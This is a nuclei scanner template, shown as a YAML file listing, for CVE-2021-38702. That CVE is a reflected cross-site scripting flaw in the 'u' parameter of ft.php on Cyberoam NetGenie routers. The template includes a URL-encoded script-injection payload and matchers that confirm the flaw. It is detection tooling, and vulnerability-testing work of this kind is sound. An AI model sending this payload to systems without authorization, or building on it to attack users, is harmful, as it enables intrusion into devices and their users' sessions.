nuclei-templates/cves/2021/CVE-2021-38702.yaml

39 lines
1.0 KiB
YAML

id: CVE-2021-38702
info:
name: Cyberoam NetGenie Cross-Site Scripting
author: geeknik
severity: medium
description: "Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php."
reference:
- https://seclists.org/fulldisclosure/2021/Aug/20
- https://nvd.nist.gov/vuln/detail/CVE-2021-38702
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-38702
cwe-id: CWE-79
tags: cve,cve2021,cyberoam,netgenie,xss,router
requests:
- method: GET
path:
- "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
# Enhanced by cs on 2022/04/01